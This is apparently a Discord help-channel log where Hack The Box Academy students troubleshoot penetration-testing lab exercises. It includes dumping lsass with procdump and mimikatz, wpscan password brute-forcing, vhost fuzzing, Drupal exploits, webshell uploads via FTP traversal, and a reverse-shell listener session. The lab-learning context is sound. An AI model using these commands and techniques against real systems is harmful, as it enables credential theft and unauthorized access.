Hello everyone I’m very new here and I just had a quick question that has been torturing me for the past 3 days lol. I’m on the windows privilege escalation module in the SeDebugPrivileges section and after rdping into Jordan’s account and running cmd as admin it’s giving me an access denied whenever I try to make a dump file. I’ve already tried to change my privileges through the local policy settings but I don’t have access to that either. Any help would be really appreciated.
If you are trying to run command prompt/powershell as an admin and you submit the password, it would work
Thank you. Tried upgrading it but threw error so I will try this
I already tried running it as admin and putting the password in. It still just says that the Sedebugprivilege is ‘disabled’ and whenever I try to procdump lsass.exe it shows an error and says access denied.
I have just tested the exercise and managed to get the NTLM hash by dumping the lsass process using procdump and mimikatz
Currently doing the "Living off the Land" section within the "Active Directory Enumeration & Attacks" module, but I feel like the provided machines don't always fit the sections, like it's not letting me downgrade powershell due to the right version of .NET not being installed, I also can't check the firewall with the provided commands. Getting so many errors while trying to follow the given commands and instructions
Not everything shown in the section can be applied to the scenario presented by the questions/exercises
help
Can I ask what you did step by step leading up to dumping lsass with mimikatz? Maybe see what I’m doing wrong
the step of running a command prompt as an admin
Hello guys, I have a doubt in the module "Information Gathering - Web Edition" and the section is "Virtual host". I'm stuck on the questions, I'm stuck on brute forcing the IP to get the subdomains. I simply used gobuster with the given command and ran it, but it is not working. Can anyone tell me the right approach? I used this command: gobuster vhost -u <Ip address: portNumber> -w <wordlist> --append-domain
Also I used subdomains-top1million-110000.txt
Hey folks,
This might be a stupid question, but I'd rather be safe than sorry.
In the HTB Academy's "Information Gathering - Web Edition" module, specifically the "Subdomain Bruteforcing" section, the question for the cube is: "Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com."
However, inlanefreight.com is a live website on the world wide web, and there is no VPN for this challenge. Am I supposed to brute-force this website outside of the HTB environment?
Have you verified whether or not you can write files to the directory you are currently in
I don’t think so. I’m not at my computer right now but I did check my privs and the debug privilege was disabled so I figured that was where the error was coming from
Hi everyone, dumping is the phase when i use reg.exe to save the HKLM hives or the phase when i use secretsdump to decrypt the hashes?
The user does not have permission
Yes, inlanefreight.com is hosted by HackTheBox so you can just bruteforce the subdomains
Yes
saving the HKLM hives, using secretsdump to decrypt the hashes is cracking
So there is an error in "Attacking SAM, SYSTEM, and SECURITY" section, because there is written "One particularly useful tool for dumping hashes offline is Impacket's secretsdump."
Copilot says dumping = reg.exe, decrypting = using secretsdump as well
okay cool. thanks for answering 🙂
thanks for the help. ill do just that .)
someone?
Of course! lmk if you need help with the actual exercise part!
Thanks, I appreciate your help.!
echo 94.237.120.230 mail.smtpinjection.htb >> %SystemRoot%\System32\drivers\etc\hosts
ipconfig /flushdns
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
This site can’t be reached
mail.smtpinjection.htb refused to connect.
@earnest jacinth
can you do nslookup mail.smtpinjection.htb ?
nslookup mail.smtpinjection.htb
Server: UnKnown
Address: fe80::1
*** UnKnown can't find mail.smtpinjection.htb: No response from server
can you show output of type C:\Windows\System32\drivers\etc\hosts
That looks like a Docker container. This means that the machine is only available on the specified port.
C:\Windows\System32>type C:\Windows\System32\drivers\etc\hosts
94.237.120.230 mail.smtpinjection.htb
it's actually there but when trying to access it from the browser the connection is refused
The IP suggests it is a docker container, when you are visiting the website are you supplying the port as well?
You must access the page as follows
http(s)://mail.smtpinjection.htb:<PORT>
there is no port specified on which one is target. there are only vhost in lab
how to know on which port there is lab
It is provided with the IP address you have obtained by spawning the target
Thanks
CBBH - Web Fuzzing Section 6 - Virtual Host and Subdomain Fuzzing
Hey guys, not a question from a question but I just followed the course and set up :
echo "myboxIP inlanefreight.htb" | sudo tee -a /etc/hosts
Then proceeded with the course but I get the following error:
curl: (7) Failed to connect to inlanefreight.htb port 81 after 18 ms: Couldn't connect to server
I tried to restart the target twice, restart the box once, I didn't put IP:PORT in my hosts file so I don't really know what could happen here, I use the PWNBOX
You need to put the port in your curl command
I did ?
From the error message it seems it tried to connect to port 81
yup
Ok yeah, sorry the course material got me confused a lil bit since usually placeholders are used
thanks
Where do I find the target IP address on an Academy module (the Metasploit one)?
There's a VPN Servers section offering a download for a VPN connection file. Then I've got the Pwnbox which has spun up and I'm on. But there's no details on the target IP
Within the questions there is a distinctive text that goes Click here to spawn the target system!
Pwnbox and the target are two different things
In the place of the Spawn Target (1 / 1) this Pwnbox appeared
Scroll down a bit in the page and you will spot it
the green bit of text "Click here to spawn the target system"
Are you using OpenVPN or pwnbox?
Pwnbox, I just thought from the look of what happened that I spawned the target instance, and the Pwnbox was appearing in its place, but non-paying academy users get 1 Pwnbox spawn per day?
Believe so yes, so I would recommend connecting using OpenVPN instead.
Coolio will do, got a Kali Linux laptop in the wings
Best practice is VMs or clean installs since certain configs or downloads you need to perform during Academy could mess up the system.
Or regular backups
Hello guys, I have a doubt in the module "Information Gathering - Web Edition" and the section is "Virtual host". I'm stuck on the questions, I'm stuck on brute forcing the IP to get the subdomains. I simply used gobuster with the given command and ran it, but it is not working. Can anyone tell me the right approach? I used this command: gobuster vhost -u <Ip address: portNumber> -w <wordlist> --append-domain
Also I used subdomains-top1million-110000.txt
Hello I'm new here
And I need help in how to start
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Are you connected to the VPN?
Ya host is alive
port 80 or 443 is open I assume
Nope the port is given along with the ip
Ahh
try ffuf -u http://ip:port -w path/to/wordlist -H "Host: FUZZ.ip:port"
to see if it works with a different tool
Doesn't work, I just ran the above command exactly, just replaced the IP and port number along with the path
Did you add the vhost to your /etc/hosts file
It tells you what vhost is needed for the question
No , I saw this in youtube but did not understand why we do this
The server selects which site to serve based on the hostname in the Host header, so that must match the vhost configs. Add the host to your /etc/hosts file then you can use the host in place of the IP in your commands and it should work
i thought i needed to edit the hosts file because that host is unreachable by public DNS servers
Yeah, adding it to /etc/hosts makes the hostname resolvable locally. I'm commenting on why that's necessary for vhost fuzzing specifically
Because you could access the host via the IP:PORT if you wanted to
Hey there, again technical issues? I am spawning an XSS target and it doesn't seem to be reachable IP-wise. First hop is the tunnel gateway and then it dies
dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
hi, what is the difference?
one is the user, one is the machine... it's really that simple
ok but can u be more specific?
Hi there I need help in SQLI Skill assessment if anyone will help me
Hi, I am trying to do the Skill Assessment for the module Hacking WordPress and I am stuck on the first question of finding the WordPress version. I have run multiple difficult commands and have been all over the webpage to try to find a page that has wp enabled or something, even resorted to Google and ChatGPT to help, yet still no success. Was wondering if it's just me, if I am doing something wrong.
I've run
wpscan --url <url>
this says the url is live but isn't running WordPress,
curl -s -X GET <url>| grep '<meta name="generator"'
returns blank, and other methods provided by ChatGPT don't work either.
Could someone help me out please?
please tag in replies
Anyone who recently did the "Attacking Wpa3 networks"?
Can't crack the password for the module Sae downgrade attack
hey stuck in the skill assessment of module called network foundation
it is from the optional task the question is:
I did nc <ip address> 21 - means initiated the FTP protocol
then logged into it anonymously and then changed the mode of the FTP into Passive mode
and got the result but I don't know on which port I should connect to the FTP server for data connection
like how to figure out the port number, I just got (number, number, number, number ...) as the result
I also did the p1*256+p2, still wasn't able to connect
please help
"DPAPI (Data Protection Application Programming Interface) is a set of APIs in Windows operating systems used to encrypt and decrypt user credentials employed to interact with third-party services (such as websites, applications, networks, etc.). The user key is used when the process that needs to store the credentials runs in user context. For example, it is used to encrypt the Credential Locker, which is the secure container used when a native Windows application accesses a remote service and stores user credentials via Credential Manager. (This is different from cookies, which are always used when the user accesses a website directly through a browser—they are stored locally and are not encrypted by default.) The machine key, on the other hand, is used when the process storing the credentials runs in system context, such as under the SYSTEM account." correct?
so you set up a listener on the p1*256+p2? otherwise just use the ftp tool
Module: AD Enum & Attacks
Section: Skill Assessment Part 2
A hint for Q7
Submit flag under Administrator on SQL01
Tried password hunting etc but I’m stuck i feel like it’s something to do with the ||impersonation|| priv but I can’t ||impersonate|| anyone ? Any help would be appreciated 😁
Edit: nvm a google search on the priv revealed what to do, hopefully it works
Module: Hacking WordPress
Section: Attacking WordPress Users
Question: "Perform a bruteforce attack against the user "roger" on your target with the wordlist "rockyou.txt". Submit the user's password as the answer."
I am running what I think is the right command (wpscan --password-attack xmlrpc -U roger -P /usr/share/wordlists/rockyou.txt --url http://IP:PORT -t 20), and wpscan does its initial thing with finding plugins and the like, but it keeps timing out on the pw scan itself. I have tried it with different wordlists and usernames. Am I missing something, or is the machine wonky?
Hello, can someone explain me this?
Hello, Attacking Common Applications --> Attacking Drupal. Cannot conduct a drupalgeddon3 attack because the server returns internal server error 500 after each try. The initial ruby module was downloaded from github, since it's not by default on metasploit. Also does not work from htb hacking instance. I have tried debugging, doing the exploit manually and it magically removes the part with the payload, throwing an error. Anyone had this?
Hello! I am on the Attacking Common Applications module on attacking Drupal and I tried to use the drupalgeddon3 exploit as mentioned in the course but for some reason it does not seem to work. Did anyone try that and was successful?
I did
Hello from Reddit 👌
Also in Attacking Common Applications, attacking Tomcat, the multi/http/tomcat_mgr_upload Metasploit module which is mentioned in the course did not work. The manual method worked though. Anyone have any ideas?
i second this .
???
Hey everyone! Just curious if this is only me, but in the NFS module for Footprinting, there's no /etc/exports file in pwnbox, meaning I'm unable to configure NFS at all. Any suggestions?
I'm able to footprint the service still thankfully, but as for connecting to and enumerating the service for the flag, I can't do that
don't worry about the configuration aspect
with mount just use sudo with it to get it to mount properly
@sterile solstice did you get the answer? I have the same problem
About the os version that delivers winPEAS in the Module: Windows System Enumeration, i tried several answers and none of them work 🙁
Thank you!
can any body help, I am getting connection refused even after putting the right port after calculating p1*256+p2
can anyone help with Skills Assessment - SQL Injection Fundamentals i am stuck, i am trying to inject sql code on invitationcode but it does not seem to work, any hints from the folks?
What submodule of sql injection? Union Clause?
Question on Web Attacks | Advanced File Disclosure
I was able to get the flag using the CDATA method, but I can't seem to do it with the Error-Based one. I can't seem to get the error to pop, but I'm unsure if I'm doing something wrong. Anyone have a second to lend a hand?
Can anyone help me understand what is going on here?
--skip-ssl
thank you
You're welcome
Yeah I can't seem to get the error-based to work, if anyone gets a hand to lend, @ me please
I'm working through the Attacking Common Services the Easy Lab. I'm struggling to find a login/password, tried using smtp-user-enum with VRFY & RCPT and many of the SecLists username lists. Am I going about this wrong? I notice the FTP version of the target is vulnerable to the CVE in the Latest FTP Vulnerabilities section, but I need a login for that
There's a userlist you can download at the top under Resources
Thank you
Yep 😂 I never checked that too until then.
I guess I like working harder than I need to.
I have a question:
Recently I asked about is there any way to connect to the windows machine terminal instead of using slow rdp. I have low user so can not use winrm and ssh is disabled..
I have tried dropping a payload for a shell but I am not getting a connection back. I have used the correct IP and everything. Any walkthrough?
Curious, I'm thinking about doing a subscription to get the answers when I get stuck and to get CPEs. What are the step-by-step solutions like? For example, does it just show all of the steps or one at a time as I need help? Basically I still want to push myself and not just run through the exercises
U completed it? If not dm me I will help
Its pretty much a step by step that you scroll through with command/output then a sentence describing what you have to do next. You can scroll to the end to see the flag most of the time but that defeats the purpose imo.
Sweet, thank you for your help! I'll probably sign up mainly for the CPE submission
Any Docker gurus around? I'm doing the Parameter Logic Bugs module, am able to build and run the provided container for the first exercise, which exposes port 5000. However, I'm unable to reach that from my browser. I checked docker ps and it does look like 0.0.0.0:5000 is exposed properly.
(PS: the bridge seems to be set up properly, and I've tried hitting the public IP of the container as well but it didn't work)
Nevermind, turns out it's an issue with bcrypt, and the application didn't even fully load in the container: Error: /app/node_modules/bcrypt/lib/binding/napi-v3/bcrypt_lib.node: cannot change memory protections
Any nodejs peeps out there who can help?
Hey guys, so I've been going through the Active Directory Enumeration and Attacks module, and in the section Privileged Access I used the bloodhound ingestor to get the info, and I inserted it into my own bloodhound on my Linux attack host, but whenever I run the query to find the users with CanPsRemote it keeps giving no results whatsoever, but when I tried the bloodhound given in C:\Tools, which is given when you rdp into the box, it worked fine.
does anyone have an idea why, and how can i overcome this?
It's back to a networking issue. I rebuilt bcrypt and the application does run without crashing, but it's still unreachable from the host. It says [web app]: Web app is running at http://localhost:5000/ but my browser is still unable to connect
sorry i can't remember what msg you replied to lol. if its winPEAS, best to try a few different versions if it doesnt work. like the x64 and x86, but also the .bat or .exe versions
Hey there, is anyone else having issues accessing a path within HTB? I am trying to get into enterprise section of HTB to continue learning for CPTS but since yesterday I have received the following message: 'We are facing "Failed to fetch sections" error when trying to access a path.'
It looks like this is a known issue, but I'm unable to speak to anyone right now due to the time to provide any further feedback, sorry. Could you please raise a support case regarding this? I'll drop a message internally too.
A fix is being worked on, as stated in the banner on EP at the moment. Apologies for the inconvenience caused.
Why can't I connect? Did I make a mistake somewhere in my command? (Just to clarify, I did activate the target.)
Which module / section are you working on?
I'm working on the SQL foundations at the "service and process management" stage.
That section is in the Linux Fundamentals module, just FYI
yeah exactly
mb mistake
😄 np
hi there, I got some troubles to connect target in lab: https://academy.hackthebox.com/module/268/section/3060
this IP target I got is 94.237.53.126:37485 but I can not access this target via browser
I need a guide in my with HTB please anyone
If you see in the module, the endpoint is /swagger, try adding that to the URL. http://94.237.53.126:37485/swagger
Best to just say which module/section/question you're on and ask your question
How can I set up a workstation
https://academy.hackthebox.com/course/preview/getting-started for a guide for Academy and the process in general
To setup a workstation, depends upon your chosen distribution, for example
This guide will cover the following steps:
is there a specified endpoint for the question?
404 -> not found is not the same as no route to host; which would be a vastly different error
Any ideas ? Anyone ?
I am working through the AD enumeration & attacks module and I am stuck on the DCSync part. I can only connect to one of the machines (MS01) in the section and not the attack host.
Please no disrespect
I don't understand this question:
To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above
Read the module and section content, it will have explained how to use cURL. What have you tried? Which module are you working on?
HTTP
whenever a web module references an endpoint like '/download.php' they are talking about it as if you were visiting the webpage and navigating to the 'download' page/function
so http://ip:port/download.php
I dont know how to setup my cURL
This where I am currently
...
i just gave you the syntax
you don't run curl and THEN add the url
it's curl url
also your paste contains some control characters (the 200~) so be mindful of that
Anyone know how to fix these errors on the sedebugprivilege on the windows esc module??
make sure to run debug::privilege in mimikatz
well it looks like procdump did its thing
but look at mimikatz, it literally gave you an error
which is where the problem lies
actually
nvm i know the problem
@glad sky you're using the 32 bit mimikatz, not 64 bit
i just peeped the title bar
Still don't get what going on
curl http://ip:port/download.php
Sorry to say
Am new on this I don't really understand what you are saying if you can please break it down for me
.... i'm not sure how much more you need it broken down
ip:port is the ip and port that the module gives you
Ok
Still don't understand dude
curl is a command you use in the terminal, you can use man curl to find out more about the command. the url, http://ip:port/download.php is a representation of the website and endpoint you're having curl connect to. ip is the ip address, port is the port.
AD Enumeration & Attacks - Skills Assessment Part II
Q) Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
now that i have the credentials to mssql of a privileged user and want to get a shell i used the reverse shell powershell cmd, but it's too long and then i planned to send a payload but it says cannot execute this particular file (so probably security policies are causing the issue), so then i tried to get a hash back of spn via responder, that did not work either, the responder is not being triggered .. help ?
thanks NutsGPT ❤️
...
you just asked, no need to bump when it's still on screen
did you try dumping things?
dump from where i dont have access to anything other then mssql
just to make sure i understand; do you have the ms* password? if so, try reusing it for other services
i have the creds of net** which i did retrieve from the config file
ahhh ok; xp_cmdshell is your next step
yup...
consider privileges you may have and tools you may be able to use to impersonate an admin
shouldn't catching the hash with responder of the spn work ? or running a payload which will give me a shell back ?
that's all well and good, but the shell would only have the privileges of the user you have... unless you impersonate
If you have the Sedebugprivilege you can use procdump and mimikatz
so ultimately i gotta do privilege escalation in mssql itself (or i can also impersonate someone)?
there is an Se privilege, but it's not for procdump or mimikatz
they are before the dump stage :) i just didn't know where they were at
there's something you can do to SPOOF your user 😉 😉 😉
I suggest going over your notes to see where you might be able to understand what I mean
note that the tool isn't explicitly showcased in the module, but it is mentioned alongside some taters
i know what u mean , i was so fixated on getting a shell back or catching the hash via responder i did not think about that ..
Yo my bad if these are bad questions but I just started my journey and am doing this module but I cannot answer these 2 questions I am wondering if you guys know the answers: Question 1: What type of network cable is used to transmit data over long distances with minimal signal loss? Question 2: Which protocol manages data routing and delivery across networks?
- the format is a-b (and not the word cables)
- xyz/ab this is explicitly in the reading
but im still little confused y was i not able to catch the hash ...
¯_(ツ)_/¯
likely just not broadcasting
Thanks for letting me know I just didn't understand the formatting of the questions. Also sorry but I don't understand the first point you made.
it's just expecting a-b
it's not expecting the word cable(s)
like cat-5 instead of cat-5 cables
I see, thank you very much for the help. I appreciate it.
How can I setup my own workstation
https://academy.hackthebox.com/course/preview/setting-up; each OS has their own documentation for installing as well
Have someone complete the interaction with users for this Windows Privilege Escalation module?
about the module of Android Penetration Testing Automation
the error message alway happen on pip3 install frida==16.7.17 frida-tools==13.7.1, the error message in chap Objection and Medusa - Bypassing Security Mechanisms
```
Traceback (most recent call last):
  File "/home/kali/Android/auto/Objection/objection-venv/bin/objection", line 8, in <module>
    sys.exit(cli())
             ^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 1462, in __call__
    return self.main(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 1383, in main
    rv = self.invoke(ctx)
         ^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 1850, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 1246, in invoke
    return ctx.invoke(self.callback, **ctx.params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/click/core.py", line 814, in invoke
    return callback(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/objection/console/cli.py", line 114, in explore
    agent.inject()
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/objection/utils/agent.py", line 202, in inject
    session = self.get_session()
              ^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/objection/utils/agent.py", line 166, in get_session
    self.spawned_pid = self.device.spawn(state_connection.gadget_name)
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/frida/core.py", line 86, in wrapper
    return f(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^
  File "/home/kali/Android/auto/Objection/objection-venv/lib/python3.12/site-packages/frida/core.py", line 1029, in spawn
    return self._impl.spawn(program, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
frida.ProcessNotFoundError: unable to find process with name 'system_server'
```
(emulator-5554) medusa➤run -f com.hackthebox.myapp
[2025-11-07 17:08:42,099 - ERROR] - An error occurred while attempting to start the requested package: unable to find process with name 'system_server'. Retrying with monkey command...
...
plz help, thx
i am stuck at CRUD API, i followed the following requirements but the flag won't appear :" First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag."
ok find my error sry
Hi
Can someone help me? My question is: how do I find a writable shared folder?
can anyone help with skill assessment of sql injection Fundamentals? i bypassed login page but i dont know what to do next
Yes, I unload the same version of frida-server to AVD, and this error happen
The team shipped a fix for this just now, so hopefully you should be all good to go now 🙂
intro to bash question Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
34070
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
808B9B4EB27F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:providers/implementations/ciphers/ciphercommon_block.c:107:
it gives me the error
@amber rose remove that content which spoils portion of a Tier 1 module please.
You can ask for aid without pasting the whole damn section exercise
mb
Thank you
I understand, but someone may be able to help in DMs to avoid spoiling module content that is over Tier 0 🙂
alright
Hello, Attacking Common Applications --> Attacking Drupal. Cannot conduct a drupalgeddon3 attack because the server returns internal server error 500 after each try. The initial ruby module was downloaded from github, since it's not by default on metasploit. Also does not work from htb hacking instance. I have tried debugging, doing the exploit manually and it magically removes the part with the payload, throwing an error. Anyone had this?
I am doing the SOC Analyst job role path, and this first module is more like a conceptual framework rather than anything practical, how am I supposed to study this? Idk maybe this is a weird question to begin with, but it currently feels like passive reading, is this wrong?
Hello,
is there a problem with Academy ? i can't ping the target IP in my local account but even too on the attack box
It's just the Reverse & payload module
https://academy.hackthebox.com/module/115/section/1106
I tried an another module, and was able to ping the target.
Switch to a US vpn works better imo
I mean you do need a rough knowledge of basics
Anyone who recently did the "Attacking Wpa3 networks"?
Can't crack the password for the module Sae downgrade attack
Anyone able to give a nudge on Web Attacks | Skills Assessment? I can't seem to figure out how to grab the admin
I've ran an IDOR script to pull info from all users, but there's no indication of admin as well
I'm working through the Easy Lab for Attacking Common Services. I found the username and password, discovered I have access to FTP and MySQL db, but not seeing much in either. The account doesn't appear to have RDP or SMTP access, so I've hit a wall. Any hints?
I also tried setting up web shells, using evil-winrm trying to get a CLI on the target with no success
anyone able to give me a nudge on the footprinting lab medium (cant seem to find a foothold)?
Which one there is 3 labs so you want hint for the medium one or the other one
For the medium one
Ok now i assume you did the nmap scan so just analyze it properly see if there any service you see which you encounterd before in the module
.
I am stuck on PRTG module on attacking common applications . I can’t login using the dangle credentials prtgadmin:prtgadmin
Update to this - found admin user - but can't seem to change their PW even after getting a 200 OK in Burp..?
Hey all. Uhm, can someone help me with a sanity check please? I'm on the skills assessment of the Password Attacks module
I'm ssh'd to the jumpbox with -D to have a proxy via the jumpbox. But I just can't figure out why commands run with proxychains isn't being forwarded.
thank you
I can't give you any help with using ssh -D but ligolo worked flawlessly for me
Oh boy, that's a whole new topic for me (ligolo). Will stick a pin in that and have a look later. Thanks for the idea. I'm determined to figure out proxychains first
Trust, Ligolo is a much better proxy option, I haven't used proxychains since Ligolo
Agree 100%
so I have finally returned, but things are not going well. I am in "Linux Fundamentals" module: "working with files and directories". It's asked me to use "tree" but it does not exist on the spawn, so i used READ LINK -F. not a big deal, but it's the questions at the end.
first: What is the name of the last modified file in the "/var/backups" directory? Answer: "alternatives.tar.0" but says that is wrong.
second question: What is the inode number of the "shadow.bak" file in the "/var/backups" directory? except this file does not exist in the pwnbox. are these lessons way outdated due to changes made in the system or, the more probable answer, am i stupid.
Ok, I can see the appeal, straight forward tunnel setup 🤔 thanks for the suggest.
You're welcome
Does anyone have working steps to recompile the .jar file for the "Attacking Web Thick Clients" from the module Attacking Common Applications?
Can I DM you about this?
Can anyone help me in trust attacks skill assessment Q3?
Is there an issue with the servers currently? My RDP connection keeps dying. I can't even pull the .jar file onto my impacket smbshare (fails with network error). Already switched VPN twice and on my 10th box reset
i'm not staff so i wouldn't have knowledge of any infra issues; https://status.hackthebox.com is a good place to check if you're unsure if there's issues
I'm working through the Easy Lab for Attacking Common Services. I found the username and password, discovered I have access to FTP and MySQL db, but not seeing much in either. The account doesn't appear to have RDP or SMTP access, so I've hit a wall. I also tried setting up web shells and using evil-winrm try to get a CLI on the target with no success. Any hints?
writing files is handy, just be wary of / direction
Yeah, I did the FTP vulnerability, but not sure where that's going to get me
the vulnerability allows you to traverse when writing files; curl can be used for more than http you know
Right, but traversing to write a file is different than directory traversal in the address bar where I can see what's in directories. I know curl can be used for more, but I'm missing the connection you're referring to
you don't need to read the files, you can write a webshell 😉
I tried that, it just allowed me to download the aspx instead of execute it
the file in ftp tells you where the webroot is
why are you trying to write an aspx file? maybe php will do. don't overcomplicate things
I used the aspx before, so figured I would repeat it, but I know php is on there. I'll give that a go, thank you!
Can I get a nudge for the web attacks | SA I can't seem to find the xxe - I've tried all of the methods, but I can't get anything
the admin has access to an interesting feature
yeah I'm in admin - I have the xxe injection point, I just can't get anything to work
a filter should do the trick
Interesting I'll have to try again then - tried before and couldn't get anything
Yeah I just get ... '' has been created
Yeah - none of these requests are even hitting my server
idk guess i'll table it for a while
Hey Marcie I switched mimikatz.exe to x64 and it’s still showing the same issue.
If anyone ever needs help with the "LLM Output Attacks Skills Assessment," DMs are open, though it may take up to 24 hours for a response.
Marcie it fucking worked ill never doubt you again big bro 🫡
Im stuck .
In win priv esc module skills assessment I
Can I get any help?
I tried to use juicypotato vulnerability but i can't get a rev shell
I ran grep about adb shell friday process to check before, but no mind, I’ll try again tonight and let you know then. thx
Hey @fathom pendant , I'm getting errors trying to use the laudanum shell.php and reverse-shell.php. Any ideas?
shell.php - Error in Browser
Parse error: syntax error, unexpected '$allowed' (T_VARIABLE) in C:\xampp\htdocs\shell.php on line 56
reverse-shell.php - Error in Listener
┌──(stinger㉿kali)-[/usr/share/laudanum/php]
└─$ sudo nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.17.142] from (UNKNOWN) [10.129.203.7] 49679
'uname' is not recognized as an internal or external command,
operable program or batch file.
Looks like it's working to me. It just can't find that command, uname. Think about why you think that may be. There's a few clues in your post as to why.
Really? I'm not sure because I know the uname command works
Apparently it doesn't work, according to what you wrote. It says command not found.
Right, I mean outside of the script I can run uname with no issue
You ran the command just fine, it just couldn't find the command.
I'm not sure why that would be
It's because the command doesn't exist within the underlying host you're running the command on.
I wasnt aware uname was a windows command 😉
Gotcha, that makes sense
Back to the drawing board, but at least I know where to upload the shell. Thank you!
Maybe time to go to bed 😀
-o signifies output, meaning that you're saying the output file is http://ip:port/download.php
Is what
take out the -o argument BEFORE the url
it's printed in the terminal @silver citrus look closely
you can also add -o download.php to the end of your curl command
You can even setup listening ports on the target directly from the proxy running on your attack hosts to forward packets to your attack host for reverse tunneling
And runs nmap fairly well
any idea what triggered this ?
no idea; could be terrible connection trying to reconnect
i had foxyproxy on and burp opend but didn't intercept anything does this have anything to do with this error message ?
Hi for AEN module, why does double pivot using ligolo drops after around minute?
Update: It was due to WINRM shell, I tried using smb one and it works fine
Hello guys CPTS Module (Attacking Common Applications > PRTG Network Monitor) Has no/missing pictures within . I tried refreshing , it is not a network issue
Also having this issue with modules on the CPTS path (Pivoting, Tunneling, and Port Forwarding). Restarting/updating my browser fixed this.
I also ran into an issue where I couldn't spin up an instance because a VPN key couldn't be generated. If this happens to you, relogging fixed it for me.
Ok thanks it worked
Hi there, i'm having an issue with the second question of Android emulators on android fundamentals, this is the question: Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test). i found the build number --> UE1A.230829.036.A4 but the format doesn't make sense and i didn't manage to find any other compatible build number. am i doing something wrong or am i searching in the wrong place?
Are the images from the module’s section not loading for anyone else ?
It just loads and then disappears for me. I’ve got no vpn nor proxies turned on
Edit: I forgot to read the previous messages 👍😊
Anyone completed GPO attacks module. I successfully abuse the privilege of gabriel but still not able get PSSession
Meusa - webservices lab issue in CWES learning path.
can someone please help me , about the Graphql module
hi, i don't know if any of you had the same problem, i'm doing the Linux Fundamentals module, and for most of the tasks it says my answer is wrong, i was checking and checking, and i didn't find the correct solution, i asked chatgpt and it said that my answers were correct, has anyone else had similar problems?
Can anybody who has completed "osTicket" give me some hints please?
Hey Guys,
I'm at the Graphql Module from CWES Path and in "Information Disclosure" i found a flag after a query from users... But the flag doesnt accepting "Error
Incorrect answer!".. need help pls.
Port 22 isnt open
Use sample creds provided in the reading
Another example of chatGPT being confidently incorrect. One of the main reasons for incorrect answers in linux fundamentals is not being connected to the target.
Spawn instance spawns the in-browser pwnbox, theres a separate button for spawning the target which should be a 10.129.x.x ip
In the footprinting module, domain information section there is this command for dns resolution to see what all subdomains r live
in the output we have one aws result but in the command we have filtering for results containing the domain name
the result seems incorrect
thank you very much
Hey guys, I'm working on the Advanced XSS and CSRF Exploitation - Skills Assessment. I'm stuck at the last part. I've tried variations of the payload shown as an example in that section of the module, but I either get no response or I get ||{"error":"Something went wrong"}||. I know what I'm supposed to do, but I can't seem to figure out how to correctly modify the payload. Is anyone available for help?
yo guys, i want tips on file inclusion skill assessment
try everything from the module
I have a question about subscription and a path, student subscription to be exact. I want to start learning with Junior Cybersecurity Analyst and i don't have a subscription yet. If i buy a student subscription will i need to purchase anything more? Will it cover the entire path?
The billing page where you purchase the subscription shows exactly what you get access to. https://academy.hackthebox.com/billing/monthly-billing tldr; it gives full access to all modules for the CWES, CPTS, CDSA, and yes, CJCA paths as well as the AI red Teamer job role path.
Ahh alright, i was worried i would have to spend more. This whole cube system is a bit off-putting
The subscriptions don't use cubes to unlock
The student subscription is incredible value
Does it show up to just anyone signing in with a gmail or whatever mail account, or do i get it because mine is a university email?
You need a recognized edu email, and if it's not recognized you can email HTB and they can set it up if it's legit
Ahh, i see the student option so it must be recognised right?
yeah if you can buy it. it's grayed out for me.
Hi. Can I ask for a nudge on how to get ||tangui's|| NTLM in DACL II - Skills Assessment Q2? Just single word.
Yea thank you very much SuperNuts, you have been of great help
Look for users which have rights over tangui
I'm having issues setting up droopescan on my Kali Linux. Did anyone experience similar issue and was able to fix it? I tried setting up venv environment and python3.10 but no luck. Stuck on "Attacking Common Applications" Module in the CPTS because of it
It'd help if you were more specific about the error you were getting.
```
└─$ droopescan --version
Traceback (most recent call last):
  File "/home/kali/VirtualManagedTools/droopescan-venv/bin/droopescan", line 3, in <module>
    from dscan import droopescan
  File "/home/kali/VirtualManagedTools/droopescan/dscan/droopescan.py", line 4, in <module>
    from cement.core import backend, foundation, controller, handler
  File "/home/kali/VirtualManagedTools/droopescan-venv/lib/python3.13/site-packages/cement/core/foundation.py", line 8, in <module>
